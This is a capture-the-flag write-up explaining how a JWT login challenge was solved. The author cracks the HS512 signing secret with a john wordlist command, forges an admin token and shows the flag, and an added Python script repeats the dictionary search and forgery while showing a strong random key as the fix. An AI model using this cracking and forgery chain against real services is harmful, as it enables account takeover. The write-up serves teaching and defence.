Ok this time the implementation is absolutely flawless! My JWTs are stronger than your pathetic hacking attempts.

Screenshot of the linked page, you are provided with guest credentials.


I logged in with the provided credentials, which generated a JWT. The site behind the login page also reveals a link to the admin panel (Login for Admins). Since the text stated that the implementation is absolutely flawless, I thought about what could go wrong besides the implementation: clearly the password/key strength! So I took the generated JWT and had a look at it with jwt.io. But first the JWT:


A JWT consists of a header, a payload and a signature. In our case we had the following header:

{
  "typ": "JWT",
  "alg": "HS512"
}

The following payload:

{
  "user": "guest",
  "exp": 1699657597
}

And the following signature (obviously not decoded):


Since I wanted to access the admin panel and was thinking about weak keys/passwords, I wanted to generate a JWT for the user ‘admin’. So I tried brute forcing the secret, trying different wordlists I found online. At the actual event I solved it with a script I found online, but it is easily possible with john:

john jwt.txt --wordlist=shortKrak.txt --format=HMAC-SHA512

The password was Mellon, which was included in the shortKrak wordlist. Now it was very easy to create an admin JWT with the help of jwt.io; I just had to send a GET request with that JWT to the path /admin. The admin panel showed the following text:

Realy????, you managed to break my super secret and opend the doors of Durin?Welcome in Moria!Here ist your flag: MRMCD2023{4b50lu73ly_p47h371c}.Well done!
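The same chain in plain Python (added example, not part of the original writeup or the challenge code): it rebuilds the HS512 token, runs the dictionary check a developer can use to audit their own signing secret before deployment, and then shows that a forged token only verifies against the weak secret, never against a random 64-byte one. The real challenge token is not reproduced on the page, so the guest token here is constructed by signing the page's header and payload with the recovered secret, and the wordlist is a constructed stand-in for shortKrak.txt.

```python
import base64
import hashlib
import hmac
import json
import secrets

def b64url(data: bytes) -> str:
    # JWT uses base64url without '=' padding
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs512(header: dict, payload: dict, secret: bytes) -> str:
    # Compact serialisation: base64url(header).base64url(payload).base64url(HMAC-SHA512)
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha512).digest()
    return signing_input + "." + b64url(sig)

def verify_hs512(token: str, secret: bytes) -> bool:
    head, body, sig = token.split(".")
    # Pin the algorithm: never let the token's header pick a different one
    if json.loads(b64url_decode(head)).get("alg") != "HS512":
        return False
    expected = hmac.new(secret, f"{head}.{body}".encode(), hashlib.sha512).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))

def find_weak_secret(token: str, wordlist):
    # Offline dictionary audit: does any candidate reproduce the signature?
    for word in wordlist:
        if verify_hs512(token, word.encode()):
            return word
    return None

HEADER = {"typ": "JWT", "alg": "HS512"}
GUEST = {"user": "guest", "exp": 1699657597}
# Constructed: signed with the secret the writeup recovered, since the page omits the real signature
GUEST_TOKEN = sign_hs512(HEADER, GUEST, b"Mellon")
WORDLIST = ["password", "123456", "Durin", "Mellon", "Moria"]  # constructed stand-in for shortKrak.txt

def demo():
    weak = find_weak_secret(GUEST_TOKEN, WORDLIST)
    forged = sign_hs512(HEADER, {"user": "admin", "exp": 1699657597}, weak.encode())
    strong = secrets.token_bytes(64)  # what the server should have used: >= 512 bits of randomness
    # (weak secret found, forged token accepted under weak secret, forged token accepted under strong secret)
    return weak, verify_hs512(forged, weak.encode()), verify_hs512(forged, strong)
```

The audit step is exactly what john did for the writeup; the last line is the mitigation, a secret with as many random bits as the HMAC digest, which no wordlist will contain.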

So, that’s it:


Solved by petrosyan